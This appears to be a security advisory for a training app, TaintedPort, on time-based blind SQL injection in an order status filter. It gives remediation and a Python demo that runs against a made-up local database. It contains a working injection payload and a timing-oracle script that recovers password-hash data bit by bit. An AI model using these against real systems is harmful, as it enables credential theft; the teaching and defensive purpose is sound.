Blind SQL Injection - Order Status Filter
TaintedPort
Vuln ID: TP-005
Title: Blind SQL Injection - Order Status Filter
Severity: critical
Type: SQLi
HTTP Method: GET
URL: /orders
Parameter: status
Filename: -
Code Location: backend/api/models/Order.php -> getByUserFiltered() line 85
Description
The order listing endpoint (GET /orders) accepts a status filter that getByUserFiltered() concatenates directly into the SQL query string instead of binding it as a parameter. A caller who controls the value can close the string literal and append arbitrary SQL. Nothing from the injected query needs to be reflected in the response: the proof of concept below uses RANDOMBLOB(), a SQLite built-in (SQLite has no SLEEP()), to make the query measurably slower only when the injected condition is true, so the result of any subquery (here, whether the password hash of user 1 is longer than 50 characters) can be read from response latency one bit at a time. This is time-based blind SQL injection, and the same shape extracts the full hash or any other column.
Proof of Concept
status=pending' AND 1=CASE WHEN (SELECT length(password_hash) FROM users WHERE id=1)>50 THEN RANDOMBLOB(200000000) ELSE 1 END--
Remediation
Use a prepared statement and bind the status value as a parameter (for example PDO::prepare() with bound parameters) rather than interpolating it into the query string. Because status is a fixed set of enum values, also reject any value outside that allowlist before the query is built, so a malformed filter becomes a 400 response instead of reaching the database. Bind every other user-controlled filter on this endpoint the same way; the concatenation pattern is the defect, not this one parameter.
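As an added example (not TaintedPort's code), the Python script below reproduces the defect against a constructed in-memory SQLite database: it builds the query the way getByUserFiltered() is described as doing, drives the PoC's RANDOMBLOB() timing oracle to recover the length of user 1's password hash by binary search, and shows the remediated query beside it. The table layout, the sample rows, the set of allowed statuses and the smaller blob size are assumptions made for the demo.

```python
"""Added example, not TaintedPort code: time-based blind SQLi through a concatenated
status filter, run against a constructed in-memory SQLite database, beside the fix."""
import sqlite3
import time

# Scaled down from the PoC's RANDOMBLOB(200000000) so the demo finishes quickly.
BLOB_BYTES = 20_000_000

# Assumed set of valid order statuses; the real enum is not shown on the page.
ALLOWED_STATUSES = frozenset({"pending", "paid", "shipped", "cancelled"})


def make_db():
    """Constructed sample data: one user with a 60-character bcrypt-style hash."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        CREATE TABLE orders (id INTEGER PRIMARY KEY, user_id INTEGER, status TEXT, total REAL);
        INSERT INTO orders VALUES (1, 1, 'pending', 10.0), (2, 1, 'shipped', 20.0),
                                  (3, 2, 'pending', 30.0);
    """)
    con.execute("INSERT INTO users VALUES (1, 'alice', ?)", ("$2y$10$" + "a" * 53,))
    return con


def get_by_user_filtered_vulnerable(con, user_id, status):
    """Mirrors the defect on the page: the status filter is spliced into the SQL text."""
    sql = ("SELECT id, status, total FROM orders WHERE user_id = ? "
           f"AND status = '{status}'")
    return con.execute(sql, (user_id,)).fetchall()


def get_by_user_filtered_fixed(con, user_id, status):
    """Remediation: allowlist the enum value, then bind both values as parameters."""
    if status not in ALLOWED_STATUSES:
        raise ValueError(f"unknown order status: {status!r}")
    sql = "SELECT id, status, total FROM orders WHERE user_id = ? AND status = ?"
    return con.execute(sql, (user_id, status)).fetchall()


def fixed_rejects(con, status):
    """True if the remediated query refuses the value before it reaches the database."""
    try:
        get_by_user_filtered_fixed(con, 1, status)
        return False
    except ValueError:
        return True


def timing_payload(condition_sql):
    """Build the page's PoC shape around an arbitrary boolean SQL condition."""
    return (f"pending' AND 1=CASE WHEN ({condition_sql}) "
            f"THEN RANDOMBLOB({BLOB_BYTES}) ELSE 1 END--")


def probe_seconds(con, condition_sql, user_id=1):
    """Wall-clock cost of one request; slow means the injected condition was true."""
    start = time.perf_counter()
    get_by_user_filtered_vulnerable(con, user_id, timing_payload(condition_sql))
    return time.perf_counter() - start


def infer_hash_length(con, max_len=256):
    """Recover length(password_hash) of user 1 by binary search over the timing oracle.

    The threshold is calibrated from a known-true and a known-false probe, which is
    what makes the oracle usable on machines of different speed.
    """
    t_true = probe_seconds(con, "1=1")
    t_false = probe_seconds(con, "1=0")
    threshold = t_false + (t_true - t_false) / 2

    def is_true(condition_sql):
        return probe_seconds(con, condition_sql) > threshold

    lo, hi = 0, max_len  # invariant: length > lo is true, length > hi is false
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if is_true(f"(SELECT length(password_hash) FROM users WHERE id=1) > {mid}"):
            lo = mid
        else:
            hi = mid
    return hi


if __name__ == "__main__":
    db = make_db()
    print("inferred hash length:", infer_hash_length(db))
    print("fixed query, honest input:", get_by_user_filtered_fixed(db, 1, "pending"))
    print("fixed query rejects PoC payload:", fixed_rejects(db, timing_payload("1=1")))
```

Calibrating the threshold from a known-true and a known-false probe is the step that makes the oracle reliable; a hard-coded delay threshold copied from one machine is the usual reason blind-timing scripts misread bits. With the fixed query the same payload never reaches SQLite at all, and even without the allowlist a bound parameter would be compared as a literal string and match no row.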